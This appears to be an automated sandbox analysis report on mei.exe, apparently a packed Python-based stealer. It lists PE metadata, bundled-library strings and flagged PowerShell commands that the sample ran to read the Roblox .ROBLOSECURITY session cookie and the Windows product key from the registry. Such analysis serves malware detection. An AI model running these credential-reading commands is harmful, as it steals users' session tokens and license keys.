              Source: Binary string: ucrtbase.pdb source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mei.exe, 00000001.00000002.2042234592.00007FFE11EC1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mei.exe, 00000001.00000002.2042619049.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mei.exe, 00000001.00000002.2040881972.00007FFE0E151000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: mei.exe, mei.exe, 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mei.exe, 00000001.00000002.2041297975.00007FFE101D1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mei.exe, 00000001.00000002.2042063741.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mei.exe, 00000001.00000002.2041795080.00007FFE10301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mei.exe, 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: mei.exe, 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mei.exe, 00000001.00000002.2039190548.00007FFDFB63B000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mei.exe, 00000001.00000002.2042441121.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mei.exe, 00000001.00000002.2041096731.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: mei.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFB287B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB287B30
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1c9f2
              Source: wgovk1sp.dll.57.drStatic PE information: real checksum: 0x0 should be: 0xe466
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x5092b
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11c85
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x24a43
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x219f7
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13929
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: mei.exeStatic PE information: real checksum: 0x83263e should be: 0x838534
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd294
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a544
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16ee9
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9006
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15efe
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9c034
              Source: .scr.1.drStatic PE information: real checksum: 0x83263e should be: 0x838534
              Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1a0ee3
              Source: mei.exeStatic PE information: section name: _RDATA
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: .scr.1.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75C31 push r10; ret 1_2_00007FFDFAC75C33
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC77630 push rbp; retf 1_2_00007FFDFAC77649
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC78F28 push rsp; iretq 1_2_00007FFDFAC78F29
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC77F53 push rbp; iretq 1_2_00007FFDFAC77F54
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75E58 push rdi; iretd 1_2_00007FFDFAC75E5A
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75F56 push r12; ret 1_2_00007FFDFAC75F6E
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75EFA push r12; ret 1_2_00007FFDFAC75F07
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75DF7 push r10; retf 1_2_00007FFDFAC75DFA
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75CE0 push r10; retf 1_2_00007FFDFAC75CE2
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC77FEB push r12; ret 1_2_00007FFDFAC78036
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75CE5 push r8; ret 1_2_00007FFDFAC75CEB
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75E0F push rsp; ret 1_2_00007FFDFAC75E17
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC7930D push rsp; ret 1_2_00007FFDFAC7930E
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75CFE push rdx; ret 1_2_00007FFDFAC75D01
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75D06 push r12; ret 1_2_00007FFDFAC75D08
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC78405 push r10; retf 1_2_00007FFDFAC78471
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75EAD push rsp; iretd 1_2_00007FFDFAC75EAE
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75EBC push rsi; ret 1_2_00007FFDFAC75EBD
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75FB9 push r10; ret 1_2_00007FFDFAC75FCC
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC78DA5 push rsp; retf 1_2_00007FFDFAC78DA6
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC782C4 push rdi; iretd 1_2_00007FFDFAC782C6
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC7767B push r12; ret 1_2_00007FFDFAC776BF
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC78077 push r12; iretd 1_2_00007FFDFAC7808B
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC75F76 push r8; ret 1_2_00007FFDFAC75F83
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC7685F push rsi; ret 1_2_00007FFDFAC76896
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00334541 push rcx; ret 1_2_00007FFE00334542
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9AA7D2A5 pushad ; iretd 9_2_00007FFD9AA7D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9AB985FD push ebx; ret 9_2_00007FFD9AB9860A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
